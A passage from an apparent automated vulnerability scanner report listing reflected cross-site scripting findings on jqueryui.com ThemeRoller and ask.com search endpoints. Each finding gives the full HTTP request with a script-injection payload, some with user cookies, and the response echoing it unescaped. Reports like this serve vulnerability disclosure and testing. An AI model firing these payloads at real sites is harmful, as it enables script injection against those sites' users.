User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
erColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFFdf741"><script>alert(1)</script>1018a4cb3c8&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_so
...[SNIP]...

3.65. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 795c1"><script>alert(1)</script>41c916c7e5d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?795c1"><script>alert(1)</script>41c916c7e5d=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:12 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 117121

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&795c1"><script>alert(1)</script>41c916c7e5d=1" type="text/css" media="all" />
...[SNIP]...

3.66. http://jqueryui.com/themeroller/ [offsetLeftShadow parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the offsetLeftShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3efe"><script>alert(1)</script>2f5dc1da704 was submitted in the offsetLeftShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2pxa3efe"><script>alert(1)</script>2f5dc1da704&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2pxa3efe"><script>alert(1)</script>2f5dc1da704&cornerRadiusShadow=7px*//*" type="text/css" media="all" />
...[SNIP]...

3.67. http://jqueryui.com/themeroller/ [offsetTopShadow parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the offsetTopShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac264"><script>alert(1)</script>4256cccd365 was submitted in the offsetTopShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2pxac264"><script>alert(1)</script>4256cccd365&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
0&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2pxac264"><script>alert(1)</script>4256cccd365&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*" type="text/css" media="all" />
...[SNIP]...

3.68. http://jqueryui.com/themeroller/ [opacityOverlay parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the opacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d0f5"><script>alert(1)</script>ac92bb32d23 was submitted in the opacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=354d0f5"><script>alert(1)</script>ac92bb32d23&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=354d0f5"><script>alert(1)</script>ac92bb32d23&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*" type="text/css" med
...[SNIP]...

3.69. http://jqueryui.com/themeroller/ [opacityShadow parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the opacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8712f"><script>alert(1)</script>835a86cc92c was submitted in the opacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=1008712f"><script>alert(1)</script>835a86cc92c&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
conColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=1008712f"><script>alert(1)</script>835a86cc92c&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*" type="text/css" media="all" />
...[SNIP]...

3.70. http://jqueryui.com/themeroller/ [thicknessShadow parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the thicknessShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc910"><script>alert(1)</script>7e405cdb2cd was submitted in the thicknessShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2pxfc910"><script>alert(1)</script>7e405cdb2cd&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2pxfc910"><script>alert(1)</script>7e405cdb2cd&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*" type="text/css" media="all" />
...[SNIP]...

3.71. http://ss.ask.com/query [fn parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ss.ask.com
Path:	/query

Issue detail

The value of the fn request parameter is copied into the HTML document as plain text between tags. The payload 35a86<script>alert(1)</script>8f46cab7f1f was submitted in the fn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /query?sstype=prefix&fn=searchSuggestion35a86<script>alert(1)</script>8f46cab7f1f&q=re&limit=8&timestamp=1296155610067 HTTP/1.1
Host: ss.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_scnt=1; __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.1.10.1296155592

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:34:13 GMT
Server: Apache/2.2.13 (Unix)
Content-Length: 611
Content-Type: text/javascript

searchSuggestion35a86<script>alert(1)</script>8f46cab7f1f(["re",
["<span class=\\\"suggest\\\">re</span>d jacket firearms","<span class=\\\"suggest\\\">re</span>ed hastings","<span class=\\\"suggest\
...[SNIP]...

3.72. http://ss.ask.com/query [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ss.ask.com
Path:	/query

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload cb349<script>alert(1)</script>6fcc1d3815a was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /query?sstype=prefix&fn=searchSuggestion&q=recb349<script>alert(1)</script>6fcc1d3815a&limit=8&timestamp=1296155610067 HTTP/1.1
Host: ss.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_scnt=1; __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.1.10.1296155592

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:34:19 GMT
Server: Apache/2.2.13 (Unix)
Content-Length: 71
Content-Type: text/javascript

searchSuggestion(["recb349<script>alert(1)</script>6fcc1d3815a",
[]]);

3.73. http://www.ask.com/ans [l parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ask.com
Path:	/ans

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75dda'%3balert(1)//6d6e34d3af8 was submitted in the l parameter. This input was echoed as 75dda';alert(1)//6d6e34d3af8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /ans?qsrc=&o=0&l=dir75dda'%3balert(1)//6d6e34d3af8&q=regulator+boat HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Thu, 27 Jan 2011 19:47:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:47:36 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: user="o=0&l=dir75dda';alert(1)//6d6e34d3af8"; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ3OjM2LVVUQw%3D%3D&po=0&pp=dir75dda%27%3Balert%281%29%2F%2F6d6e34d3af8; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:47:36 GMT; Path=/
Set-Cookie: jss=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:47:36 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:47:36 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 173673

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>
<head>

<title>

...[SNIP]...
<script type="text/javascript">
var qstr = 'q=regulator+boat&o=0&l=dir75dda';alert(1)//6d6e34d3af8&jss=1';
window.location = 'http://www.ask.com/ans?'+ qstr;
</script>
...[SNIP]...

3.74. http://www.ask.com/pictures [l parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ask.com
Path:	/pictures

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1afd7'%3balert(1)//178827696e9 was submitted in the l parameter. This input was echoed as 1afd7';alert(1)//178827696e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /pictures?qsrc=167&o=0&l=dir1afd7'%3balert(1)//178827696e9&q=regulator+boat&v=14 HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:46:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:46:36 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: user="o=0&l=dir1afd7';alert(1)//178827696e9"; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ2OjM2LVVUQw%3D%3D&po=0&pp=dir1afd7%27%3Balert%281%29%2F%2F178827696e9; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:46:36 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:46:36 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 123748

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>

...[SNIP]...

